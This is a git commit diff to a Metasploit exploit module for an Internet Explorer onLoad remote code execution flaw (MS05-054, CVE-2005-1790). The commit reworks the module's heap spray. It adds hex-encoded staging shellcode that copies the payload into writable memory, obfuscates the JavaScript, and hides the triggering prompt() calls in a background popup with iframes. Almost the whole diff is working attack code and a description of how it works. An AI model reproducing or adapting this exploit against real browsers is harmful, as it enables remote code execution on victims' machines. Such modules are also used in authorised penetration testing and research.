Modified exploit to not need egg hunter shellcode
This commit is contained in:
Sam Sharps
parent
06414c2413
commit
87ee6905df
|
|
@ -20,14 +20,12 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
super(update_info(info,
|
||||
'Name' => 'Microsoft Internet Explorer JavaScript OnLoad Handler Remote Code Execution Vulnerability',
|
||||
'Description' => %q{
|
||||
This bug is triggered when the browser handles a JavaScript 'onLoad' handler in
|
||||
This bug is triggered when the browser handles a JavaScript 'onLoad' handler in
|
||||
conjunction with an improperly initialized 'window()' JavaScript function.
|
||||
This exploit results in a call to somewhere in the heap. The javascript prompt() puts our shellcode
|
||||
near where the call jumps to. We call prompt multiple times in separate iframes to spray the heap.
|
||||
We hide the prompts in a popup window behind the main window. The call then jumps to to our spray value
|
||||
which also acts as a sled down to the actual shellcode. Since the heap is read only, we have some staging shellcode
|
||||
which copies the metasploit payload to some read/write memory and then jumps to it. IE will crash when the exploit
|
||||
finishes.
|
||||
This exploit results in a call to an address lower than the heap. The javascript prompt() places our shellcode
|
||||
near where the call operand points to. We call prompt() multiple times in separate iframes to place our return address.
|
||||
We hide the prompts in a popup window behind the main window. We spray the heap a second time with our shellcode and point the return
|
||||
address to the heap. I use a fairly high address to make this exploit more reliable. IE will crash when the exploit completes.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
|
|
@ -40,7 +38,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
[
|
||||
['MSB', 'MS05-054'],
|
||||
['CVE', '2005-1790'],
|
||||
['URL', 'http://www.securityfocus.com/bid/13799/info'],
|
||||
['URL', 'http://www.securityfocus.com/bid/13799/info'],
|
||||
['URL', 'http://www.cvedetails.com/cve/CVE-2005-1790'],
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
|
|
@ -100,43 +98,50 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
var_title = rand_text_alpha(rand(100) + 1)
|
||||
func_main = rand_text_alpha(rand(100) + 1)
|
||||
|
||||
var_spray = rand_text_alpha(rand(100) + 1)
|
||||
var_i = rand_text_alpha(rand(100) + 1)
|
||||
var_memory = rand_text_alpha(rand(100) + 1)
|
||||
|
||||
heapspray = ::Rex::Exploitation::JSObfu.new %Q|
|
||||
function heapspray()
|
||||
{
|
||||
shellcode = unescape('#{Rex::Text.to_unescape(regenerate_payload(cli).encoded)}');
|
||||
var bigblock = unescape("%u9090%u9090");
|
||||
var headersize = 20;
|
||||
var slackspace = headersize + shellcode.length;
|
||||
while (bigblock.length < slackspace) bigblock += bigblock;
|
||||
var fillblock = bigblock.substring(0,slackspace);
|
||||
var block = bigblock.substring(0,bigblock.length - slackspace);
|
||||
while (block.length + slackspace < 0x40000) block = block + block + fillblock;
|
||||
var memory = new Array();
|
||||
for (i = 0; i < 250; i++){ memory[i] = block + shellcode }
|
||||
|
||||
var counter=0;
|
||||
var spray = "";
|
||||
var shellcode = "";
|
||||
var prep_shellcode = "";
|
||||
var fillmem = "";
|
||||
|
||||
for (counter=1; counter <= 500; counter++)
|
||||
{
|
||||
spray = spray + unescape("%u7030%u4300");
|
||||
spray = spray + unescape("%u0F0F%u0F0F");
|
||||
}
|
||||
for (counter=1; counter <= 200; counter++)
|
||||
{
|
||||
fillmem = fillmem + spray;
|
||||
}
|
||||
|
||||
shellcode = unescape("%u5053%u5053");
|
||||
shellcode += unescape('#{Rex::Text.to_unescape(regenerate_payload(cli).encoded)}');
|
||||
|
||||
prep_shellcode = unescape("%u9090%uBA90%u4142%u4142%uF281%u1111%u1111%u4190" +
|
||||
"%u1139%uFA75%u9090%uF18B%uF88B%u9057%uc933%ub966" +
|
||||
"%u00ff%ua5F3%u9090%u905f%ue7ff");
|
||||
|
||||
fillmem = fillmem + prep_shellcode + shellcode;
|
||||
|
||||
prompt(fillmem, "");
|
||||
}
|
||||
|
|
||||
heapspray.obfuscate
|
||||
|
||||
nofunc = ::Rex::Exploitation::JSObfu.new %Q|
|
||||
|
||||
if (document.location.href.indexOf("#{@var_redir}") == -1)
|
||||
{
|
||||
var counter = 0;
|
||||
|
||||
|
||||
top.consoleRef = open('','BlankWindow',
|
||||
'width=100,height=100'
|
||||
+',menubar=0'
|
||||
|
|
@ -148,11 +153,13 @@ if (document.location.href.indexOf("#{@var_redir}") == -1)
|
|||
+',resizable=1')
|
||||
self.focus()
|
||||
|
||||
|
||||
for (counter = 0; counter < #{mytarget['iframes']}; counter++)
|
||||
{
|
||||
top.consoleRef.document.writeln('<iframe width=1 height=1 src='+document.location.href+'?p=#{@var_redir}</iframe>');
|
||||
}
|
||||
document.writeln("<body onload=\\"setTimeout('#{func_main}()',6000)\\">");
|
||||
|
||||
}
|
||||
else
|
||||
{
|
||||
|
|
|
|||
Loading…
Reference in New Issue